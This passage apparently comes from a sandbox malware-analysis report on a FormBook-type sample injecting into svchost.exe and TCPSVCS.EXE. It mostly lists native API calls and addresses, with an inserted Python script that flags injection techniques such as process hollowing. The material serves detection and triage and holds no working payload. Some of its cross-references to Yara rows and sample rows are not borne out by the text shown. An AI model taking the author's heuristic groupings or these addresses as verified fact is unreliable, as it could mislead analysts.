                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E64340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E64650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E635C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E639B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E62D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E63090 NtSetValueKey
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E63010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E63D70 NtOpenThread
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E63D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00429010 NtCreateFile
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00429170 NtReadFile
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00429260 NtDeleteFile
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00429300 NtClose
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00429450 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AEF08B NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AEF1BE NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AEF88D NtUnmapViewOfSection
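The two native-API listings above (svchost.exe and TCPSVCS.EXE) show the same set of Nt* stubs resolved at private addresses (0x0377xxxx and 0x02E6xxxx), TCPSVCS.EXE additionally resolves several of them a second time from other regions (NtCreateFile at both 0x02E62FE0 and 0x00429010), and the Yara rows at the top of this section place FormBook matches in the memory of processes 2, 4 and 5. The script below is an added triage helper, not part of the Joe Sandbox report: it parses rows in this report's shape (both the fused extraction form and the pipe-separated form), groups the calls per process index, flags combinations that together form a known injection primitive (process hollowing, remote section mapping, APC injection, thread-context hijack), notes APIs that appear in more than one 64 KB code region, and correlates each process with its Yara-matched dump regions. The technique groupings are my heuristic, not the report's. Of the dotted .sdmp name I interpret only the first field (process index, which matches the N in the N_2_ function IDs) and the fourth (region base address); the other fields are left uninterpreted. The sample rows are copied from this section.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied in the shape of the report rows above. Both
# the fused extraction form ("svchost.exeCode function:") and a pipe-separated
# form are accepted.
SAMPLE = r"""
Source: Yara match | File source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62FE0 NtCreateFile,LdrInitializeThunk,5_2_02E62FE0
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429010 NtCreateFile,5_2_00429010
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62E30 NtWriteVirtualMemory,5_2_02E62E30
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E62EE0
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62FB0 NtResumeThread,LdrInitializeThunk,5_2_02E62FB0
Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E62D10
Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037B0430_2_0037B043
"""

CODE_ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<rest>.*)$")
YARA_ROW = re.compile(
    r"Source:\s*Yara match\s*\|?\s*File source:\s*(?P<dump>[0-9A-Fa-f.]+)\.sdmp")
ID_TOKEN = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")  # the repeated trailing ID

# Heuristic: a technique is flagged when every listed primitive is present.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "remote section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "APC injection": {"NtWriteVirtualMemory", "NtQueueApcThread", "NtResumeThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
}


def parse_rows(text):
    """Yield (kind, process index, source path, address, api list) per row."""
    for line in text.splitlines():
        line = line.strip()
        m = CODE_ROW.match(line)
        if m:
            apis = [t.strip() for t in m.group("rest").split(",")]
            apis = [t for t in apis if t and not ID_TOKEN.match(t)]
            yield ("code", int(m.group("pid")), m.group("src"), int(m.group("addr"), 16), apis)
            continue
        m = YARA_ROW.match(line)
        if m:
            fields = m.group("dump").split(".")
            # Assumed layout: field 0 = process index, field 3 = region base.
            yield ("yara", int(fields[0]), None, int(fields[3], 16), [])


def triage(text):
    """Per process index: source, APIs, matched techniques, multi-region APIs, Yara regions."""
    acc = defaultdict(lambda: {"source": None, "apis": defaultdict(set), "yara": []})
    for kind, pid, src, addr, apis in parse_rows(text):
        if kind == "yara":
            acc[pid]["yara"].append(addr)
            continue
        acc[pid]["source"] = src
        for api in apis:
            acc[pid]["apis"][api].add(addr)
    result = {}
    for pid, e in sorted(acc.items()):
        present = set(e["apis"])
        result[pid] = {
            "source": e["source"],
            "apis": present,
            "techniques": [name for name, need in TECHNIQUES.items() if need <= present],
            # same API resolved from more than one 64 KB-aligned region
            "multi_region": {a for a, addrs in e["apis"].items() if len({x >> 16 for x in addrs}) > 1},
            "yara_regions": sorted(e["yara"]),
        }
    return result


if __name__ == "__main__":
    for pid, info in triage(SAMPLE).items():
        print(f"process #{pid}: {info['source'] or '(no code rows)'}")
        print("  Yara-matched regions :", [hex(a) for a in info["yara_regions"]])
        print("  injection primitives :", ", ".join(info["techniques"]) or "none")
        print("  APIs in >1 region    :", sorted(info["multi_region"]) or "none")
```

Feed it the rows of a full report rather than the excerpt to see which processes carry both a memory-resident payload and the complete hollowing chain; a process with a Yara hit but no native-API rows (process 4 here) is worth a manual look at its dump, since the listing covers only code the analysis could attribute to functions.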
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00396606 CreateFileW, DeviceIoControl, CloseHandle
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038ACC5 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003979D3 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0037B043
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038410F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003702A4
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038038E
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0035E3E3
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038467F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003706D9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003BAACE
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00384BEF
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0037CCC1
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00356F07
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0035AF50
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036B11F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003B31BC
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0037D1B9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0037123A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00363200
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038724D
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003593F0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003913CA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036F563
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003596C0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0039B6CC
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003577B0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003879C9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036FA57
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00363B70
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00359B60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00357D19
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036FE6F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00379ED0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00357FA3
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00FDA128
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418583
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403030
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010DC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E17C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E127
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E133
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004011C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EBA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402480
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FDCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FDD3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402760
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041677E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DFE3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FFF3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416783
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EB02C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED0274
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EF03E6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E3E3F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEA352
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EC2000
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE81CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EF01AA
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE41A2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EB8158
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E20100
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ECA118
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E4C6E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E2C7C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E30770
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E54750
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EDE4F6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE2446
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED4420
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EF0591
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E30535
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E2EA80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE6BD7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEAB40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E5E8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E168B8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E3A840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E32840
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E329A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EFA9A6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E46962
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEEEDB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E42E90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EECE93
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E30E59
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEEE26
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E3CFE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E22FC8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EAEFA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EA4F40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E72F28
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E50F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED2F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E20CF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED0CB5
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E30C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E2ADE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E48DBF
